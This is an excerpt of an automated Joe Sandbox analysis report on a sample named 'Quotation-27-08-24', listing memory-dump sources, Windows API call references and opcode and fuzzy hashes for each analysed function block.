                                          • Opcode ID: 8d1e80c91cdc2d660cb436097387ae98d7e1812c295372c6a8b2a754f925d88b
                                          • Instruction ID: 7906cb53fc8e8a5cc1f2cf679a976babc18cbd5b85d5d84fdbf2439923ac208d
                                          • Opcode Fuzzy Hash: 8d1e80c91cdc2d660cb436097387ae98d7e1812c295372c6a8b2a754f925d88b
                                          • Instruction Fuzzy Hash: AA21E6B1D003599FDB10DFAAC881BDEBBF5FF48310F10882AE519A7240D779A950CBA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F99FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 0f45adcc9ccb53c42e78b24ee31a6d72c0b454d94d29aa17bf1af56e4084fe97
                                          • Instruction ID: d4f7250227197e7ba8471bc5e29869a3b1a43966af80283fd4bde30b625342a1
                                          • Opcode Fuzzy Hash: 0f45adcc9ccb53c42e78b24ee31a6d72c0b454d94d29aa17bf1af56e4084fe97
                                          • Instruction Fuzzy Hash: 0B114776900249DFDF10CFAAC845BDEBBF5EF88720F248419E519A7250C775A550CFA1
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0140CC99,00000800,00000000,00000000), ref: 0140CEAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 7e1b1ddcdb43a8972e8a7f9f769fce7214bfab316632b45e690bfbf7533e46ab
                                          • Instruction ID: ca7a1b09f8c1268d42a1d7bda8b3dc25a29764c7d7536ed0368c455840dccbd2
                                          • Opcode Fuzzy Hash: 7e1b1ddcdb43a8972e8a7f9f769fce7214bfab316632b45e690bfbf7533e46ab
                                          • Instruction Fuzzy Hash: 631117B6900309DFDB10CF9AD484BDEFBF4EB48320F10856AD519A7250C375A945CFA4
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F99FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: de7fb8891700c83e29cc533029169e0bfe28bdcc40d8851c8da0c050d191978f
                                          • Instruction ID: 493e53963fab68571603911fda7bf8996e92c9c4bf7b60d36310e50adcdae317
                                          • Opcode Fuzzy Hash: de7fb8891700c83e29cc533029169e0bfe28bdcc40d8851c8da0c050d191978f
                                          • Instruction Fuzzy Hash: B11156729002499FDF10CFAAC844BDEBBF5AF88320F208819E619A7250C775A550CFA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 08d39c5d7032222c300fe738ac5f135fbdf40928a03e8af5ed6c9265a1467fb1
                                          • Instruction ID: e34fd21739441231383de176cb1e6345ba0d16e38de0242b227387899723ae25
                                          • Opcode Fuzzy Hash: 08d39c5d7032222c300fe738ac5f135fbdf40928a03e8af5ed6c9265a1467fb1
                                          • Instruction Fuzzy Hash: 381188B19003898FDB20CFAAC4447DEFBF4EF88724F24881AD519A7200CB75A840CF94
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 0f769b000f92cf3c807961cda6d05552df0950a4a9bfae8d0dccf933ea3a8d41
                                          • Instruction ID: c60f1995be573794f2e98d32225ae93218843ffb6766d6b2875d1154ee312a2b
                                          • Opcode Fuzzy Hash: 0f769b000f92cf3c807961cda6d05552df0950a4a9bfae8d0dccf933ea3a8d41
                                          • Instruction Fuzzy Hash: 821128B5800749DFDB20DF9AC545BDEBBF4EB48320F108419D619A7250D778A944CFA5
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: d082812a453c0b85d590d7f8e1ea0b7e7c16f284d485d1d145e97c7430034d6a
                                          • Instruction ID: 2e813058c20a3146b5401dc36d872cf7a0728d0d26b3eeb1dc2b69d7400d4b78
                                          • Opcode Fuzzy Hash: d082812a453c0b85d590d7f8e1ea0b7e7c16f284d485d1d145e97c7430034d6a
                                          • Instruction Fuzzy Hash: 061143B580024ACFDB20CFAAC544BEEBBF4EF48320F24845AD558A7241D778A544CFA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 04bcc813c03d422607674fa28f2c97c75190963d5af22a6426489961a591aac1
                                          • Instruction ID: 104667c37fffcec1fe8c69b4bed2f34f970a643ca2f94ae7f84091545b3e4d82
                                          • Opcode Fuzzy Hash: 04bcc813c03d422607674fa28f2c97c75190963d5af22a6426489961a591aac1
                                          • Instruction Fuzzy Hash: B0113AB19003498FDB20DFAAD4457DEFBF5AF88724F248819D519A7240CB75A540CF95
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 073FC4FD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 1cd9cc964b7d53855e5073149f0fd8d8c8b37ae4cb486a61724d3c083b994b92
                                          • Instruction ID: eac6cb0b0eaf0e0c0ae322b1b4ef2f73f2a4fadbb2f25fbe3dd682528d50859b
                                          • Opcode Fuzzy Hash: 1cd9cc964b7d53855e5073149f0fd8d8c8b37ae4cb486a61724d3c083b994b92
                                          • Instruction Fuzzy Hash: D111F5B5800759DFDB10DF9AD545BEEBBF8EB48320F108419E619B7240C3B5A944CFA1
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0140CC1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 1fd1626158096342048eddaef6789f07bf5b4c1ef12e5b56bb5eb2a1f2fd94f2
                                          • Instruction ID: fd9d1dde64974259e269b1decc1a685a48a0b7172587e036d4f8b0d718486e3d
                                          • Opcode Fuzzy Hash: 1fd1626158096342048eddaef6789f07bf5b4c1ef12e5b56bb5eb2a1f2fd94f2
                                          • Instruction Fuzzy Hash: 08110FB6C00249CFDB10CF9AD544BDEFBF4AB88224F20856AD519A7250C379A545CFA1
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 073FC4FD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 7ac998f43ac90617874e4adf0bddd34df11f080518ffefc1d6ceba747bab01e5
                                          • Instruction ID: 56828af703b28731b829b190e0dfd0251d9b9bd869fbe30d06939cf523f3c4b6
                                          • Opcode Fuzzy Hash: 7ac998f43ac90617874e4adf0bddd34df11f080518ffefc1d6ceba747bab01e5
                                          • Instruction Fuzzy Hash: 2811F2B58002899FDB20CF9AD584BEEBBF4EB88320F20845AE558A3240C375A544CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c713dae0ffd41f45591480a73596b7a60035d39e7a3e0b94ca9669466458e84
                                          • Instruction ID: ac9b665015e0c33bfddc856ea2b77e9a4bb0c17fd363eb1e9a09b801186761da
                                          • Opcode Fuzzy Hash: 8c713dae0ffd41f45591480a73596b7a60035d39e7a3e0b94ca9669466458e84
                                          • Instruction Fuzzy Hash: F141BEB1D00359DBDB14CF9AD884ADEFBB5BF48710F20862AE418BB250DBB56845CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd15b9d533f9910ee807b44060f84e9d93b310153ff8869cd3833ef7d745a651
                                          • Instruction ID: d6df5c6bb31ce8a45e1fec1180c04cbfc75b36c2c08b1aad70c8d01397cabf59
                                          • Opcode Fuzzy Hash: cd15b9d533f9910ee807b44060f84e9d93b310153ff8869cd3833ef7d745a651
                                          • Instruction Fuzzy Hash: E9412775A0020ADFCB04DF68C8849AEFBB5FF49310B14C299E919AB315E770E985CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c2f1a980d906b32d5f82454607ea908b7cc67ad28251630c7d008aa185ec23
                                          • Instruction ID: 1d84bee19526c8f7773e14ba3b34ff9afd89cef298b73da64e1dd394d63ccd3e
                                          • Opcode Fuzzy Hash: 47c2f1a980d906b32d5f82454607ea908b7cc67ad28251630c7d008aa185ec23
                                          • Instruction Fuzzy Hash: 4241AEB1D00359DBDB14CF9AD884ADEFBB5BF48710F24852AE418BB250DBB56845CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d25fd3a0e4b86bee471bf8f8b513a68cfd16a19ba4d7eca37872537c8af151ce
                                          • Instruction ID: 95d8cc2ff4f02a912d60141be831bb08bdb213fb64e95d28bab58fc8c0d73942
                                          • Opcode Fuzzy Hash: d25fd3a0e4b86bee471bf8f8b513a68cfd16a19ba4d7eca37872537c8af151ce
                                          • Instruction Fuzzy Hash: 65318F35B006199FDF09EF64E8448EDF7B6FFC9214B048669E506AB360EB71AD45CB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0ed59fbf078b37b08effb22010c5496cc4c11b0ec7b57e43f3cb8334a20cea6
                                          • Instruction ID: b8d7a4e41e3d0d8ddae22a2e520ca6a750dcadf5d176f645d1516aa2d4d5e9d7
                                          • Opcode Fuzzy Hash: c0ed59fbf078b37b08effb22010c5496cc4c11b0ec7b57e43f3cb8334a20cea6
                                          • Instruction Fuzzy Hash: 96411775A0020ADFCB44DF68D88499EFBB5FF49310B14C259E918AB315E770E985CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ecda0c46cf8400acb44f223e66ada0e40c25b76891fb402a2b974355efe130e7
                                          • Instruction ID: c188b6def91a6ccc29c5b1490139bd2c40c17d56cb02fc1d95ad748da7cc45fc
                                          • Opcode Fuzzy Hash: ecda0c46cf8400acb44f223e66ada0e40c25b76891fb402a2b974355efe130e7
                                          • Instruction Fuzzy Hash: 0B2124357042105BDB08B779941A7BEB7A7EFC4710F58886EE60AEB791CE794C0287E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 226d8bf1b53a3c8f0991cfd291867d9a8b9aa8261f4f3692f774872aa600d380
                                          • Instruction ID: ce86dd248a7b0ae719da67726024d0d088ace962068666a98b232931a8d16b22
                                          • Opcode Fuzzy Hash: 226d8bf1b53a3c8f0991cfd291867d9a8b9aa8261f4f3692f774872aa600d380
                                          • Instruction Fuzzy Hash: 1C21B7323142008FE714DB2DCC846A93BE6FFC5711B1991B6E20ACF7A6DAB5DC058B50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ffd162c484b07a92b4aecc722a3bc9a1feb814f18abd3ad7e6a9eb58c9ec08c1
                                          • Instruction ID: e503cddfff04a92e45bf97eac2477c72aeb4a7a051f72eaf61a3f4835af170c0
                                          • Opcode Fuzzy Hash: ffd162c484b07a92b4aecc722a3bc9a1feb814f18abd3ad7e6a9eb58c9ec08c1
                                          • Instruction Fuzzy Hash: 272180B1F001169FDF05DBA988199FFBFFAEFC8200F14855AE615E7651EAB09A01C790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68aabf50bf90da3ef212678614eb31e3bdca625b8d41102afbc653be18464d92
                                          • Instruction ID: 4ffb87a10b8b6603a8a8fe476b571a77fad5fdf72947c81847d46bb1e652fc37
                                          • Opcode Fuzzy Hash: 68aabf50bf90da3ef212678614eb31e3bdca625b8d41102afbc653be18464d92
                                          • Instruction Fuzzy Hash: 3D318F74F006059FE715DF2AC484AAABBF6FF88710B14C56DD51ADBA10EBB0E841CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f49f80ff2db793cedb49186d2c01cfcd11dbe962e28b09c3203f0da71ede13e4
                                          • Instruction ID: 90bae7fac29a3a5cb01dce62eefe8058dbdc95aa6502659628493ae76491d1c0
                                          • Opcode Fuzzy Hash: f49f80ff2db793cedb49186d2c01cfcd11dbe962e28b09c3203f0da71ede13e4
                                          • Instruction Fuzzy Hash: 5121F8716042048FCB14DB79C8484EBBBF6EF85200B55896AE505DB751EFB1ED0ACF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 757771adb162a4eb0e22eafbe436798f4245f73bba58676fb4bc199c4dd1378e
                                          • Instruction ID: 5e9a64bc44e764205c4c8863dc67fbcc00af6cd166b8bc99cb9ca4f3b6bd24da
                                          • Opcode Fuzzy Hash: 757771adb162a4eb0e22eafbe436798f4245f73bba58676fb4bc199c4dd1378e
                                          • Instruction Fuzzy Hash: 7F2104317057209FEB49AB6CC4613ED3BA1FF81610B1500ABD29ACF663EEB5C806C784
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04758d0e5c842cbbee93d7bf3d8f58fcdfec2974294aa000e769f1af7d481214
                                          • Instruction ID: c32fdc2ef45c194ddd1746ce1a5201729a8bb43460d3140ef3da7b1d3312d172
                                          • Opcode Fuzzy Hash: 04758d0e5c842cbbee93d7bf3d8f58fcdfec2974294aa000e769f1af7d481214
                                          • Instruction Fuzzy Hash: E1214F74F006059FE714DF2AC544AAABBF6BF88700B14C51CD51ADBA24EBB0E841CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118235435.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_fbd000_Quotation-27-08-24.jbxd
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118293385.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_fdd000_Quotation-27-08-24.jbxd
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c88f7c4c112e85ad3de22232395c40f8c2c2dc58bbaf76aba9487f593d7c9bd
                                          • Instruction ID: 889167f65481f2c421a6ffc0291ff991725b947ba605255f17b55e4ceb46a847
                                          • Opcode Fuzzy Hash: 0c88f7c4c112e85ad3de22232395c40f8c2c2dc58bbaf76aba9487f593d7c9bd
                                          • Instruction Fuzzy Hash: F61123B5C006488FDB10CF9AC444BDEFBF9EB88220F10841AE519A3300D3B4A604CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 915ab94378e66d3375dca48f8dc951b42bdfd45a8df9f2c9f810b29d3346e540
                                          • Instruction ID: ad30fadf3fbe3d4b664e857e737f484744964e9a1483707021aca3713149ee2a
                                          • Opcode Fuzzy Hash: 915ab94378e66d3375dca48f8dc951b42bdfd45a8df9f2c9f810b29d3346e540
                                          • Instruction Fuzzy Hash: C901D6B5E10114EBEB04DF69C849BABBBFAEB88310F144169F105EB745DE759C00CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f2beaa28097425ff142d18e2eb1d04132410509156b57c13965acd3ce0a6845
                                          • Instruction ID: 4af8c5391cfc1419eaf0f14cfb42179b0be6e6d2041fe468f27bc9b3d553b30c
                                          • Opcode Fuzzy Hash: 0f2beaa28097425ff142d18e2eb1d04132410509156b57c13965acd3ce0a6845
                                          • Instruction Fuzzy Hash: 6011F3B5C006499FDB10CF9AD944BDEFBF4EB88620F14841AE559A3210D3B4A505CFA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60dfc5f4850ad4d22e94e7a19ab3f561f08d03672feb34c00053f0276f16f90f
                                          • Instruction ID: d111dd51dbc620be5d1530603527851b3a810fdbd5eee10e49a819b8583fc90f
                                          • Opcode Fuzzy Hash: 60dfc5f4850ad4d22e94e7a19ab3f561f08d03672feb34c00053f0276f16f90f
                                          • Instruction Fuzzy Hash: 0F1110B5900349CFDB10DF9AC584BDEBBF8EB48220F20841AE619A7600D3B4A944CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 785c6aefe804b7696707322d68a6002d96e635cbadecf247669e94a3d9fd6eba
                                          • Instruction ID: 9f830f6b0831bf77fe61352f598afe1cceb008380e81aa293bab5c6e95e6c172
                                          • Opcode Fuzzy Hash: 785c6aefe804b7696707322d68a6002d96e635cbadecf247669e94a3d9fd6eba
                                          • Instruction Fuzzy Hash: 3E0192757042008FD319DB28D4999AABBF6FF8921471888ADE50AD7761CF70EC05CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 934da4940238a1638f378fe395d1d3ad20a1e44c35bbacb6d99c0af01acacffb
                                          • Instruction ID: ab69d295fec9bab7971fd7478e5e8b5167556c5b85bd3943afcb864cf45d7dfe
                                          • Opcode Fuzzy Hash: 934da4940238a1638f378fe395d1d3ad20a1e44c35bbacb6d99c0af01acacffb
                                          • Instruction Fuzzy Hash: FB01E574A04200DBE718AFA5C9297EF7BF6EF84304F504419D2069BB81DFB549048B90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83a37e48d54a0dcb70f91a41ecdb9e88fa3d4638d63315a74caba3597ccd931a
                                          • Instruction ID: 115cb170ca3dada4b7feed98c0c5b263dcb6aa0706f7118c46e4e78566405374
                                          • Opcode Fuzzy Hash: 83a37e48d54a0dcb70f91a41ecdb9e88fa3d4638d63315a74caba3597ccd931a
                                          • Instruction Fuzzy Hash: 80019E35700A008FDB19DB64D498A9ABBF6FF88311F05887DEA06D7761DB71AC00CB40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72eb0dcf4f817408bf59b0f043f1567c23a0a87d442533e62f9476d7913310f0
                                          • Instruction ID: a0491b1f98f20505cc3fa65d9ad758ff8e9a8a149a63f02c6409c8170dd1899b
                                          • Opcode Fuzzy Hash: 72eb0dcf4f817408bf59b0f043f1567c23a0a87d442533e62f9476d7913310f0
                                          • Instruction Fuzzy Hash: EB1122B5800349DFDB10DF9AD545BCEFBF8EB48320F20841AE619A7200D7B4A944CFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67c3acf99b1cc1e0967e8ac1c9eab29dd554b9846680ca9df8e2762ac6fd8493
                                          • Instruction ID: f18c19adf405539449e2b2a280031f8650fd556d861b9af8cde9496895b1df99
                                          • Opcode Fuzzy Hash: 67c3acf99b1cc1e0967e8ac1c9eab29dd554b9846680ca9df8e2762ac6fd8493
                                          • Instruction Fuzzy Hash: BE017175A001149FEB04DF59D809BABBBFAEB88314F144169E505AB359CE769C10CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06e86d65e0c2449667e076c5ff9996ff6f444239f01f3cdc8aa96d9b1e550fdd
                                          • Instruction ID: 62ab3f570b3f46255a8e2c576f74ecf0ea0105d5caf6d88d006e453da981b572
                                          • Opcode Fuzzy Hash: 06e86d65e0c2449667e076c5ff9996ff6f444239f01f3cdc8aa96d9b1e550fdd
                                          • Instruction Fuzzy Hash: F6012C747042158FD718DB29E49896ABBEAFFC931471488ADE50A8B761CFB1EC05CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9061964d689ef81146d88d9a037bec0f2ed1027f834e08ea7d8e3aaa87d07ee6
                                          • Instruction ID: e1f57e9cb83e66538eee176ef5e0f4fc22bddec6cc8103f1f2450a2b14849ffa
                                          • Opcode Fuzzy Hash: 9061964d689ef81146d88d9a037bec0f2ed1027f834e08ea7d8e3aaa87d07ee6
                                          • Instruction Fuzzy Hash: EA014031610704CFD728EF35C45449ABBB6EF85300B14C96DD6468B660EBB1E945CB41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
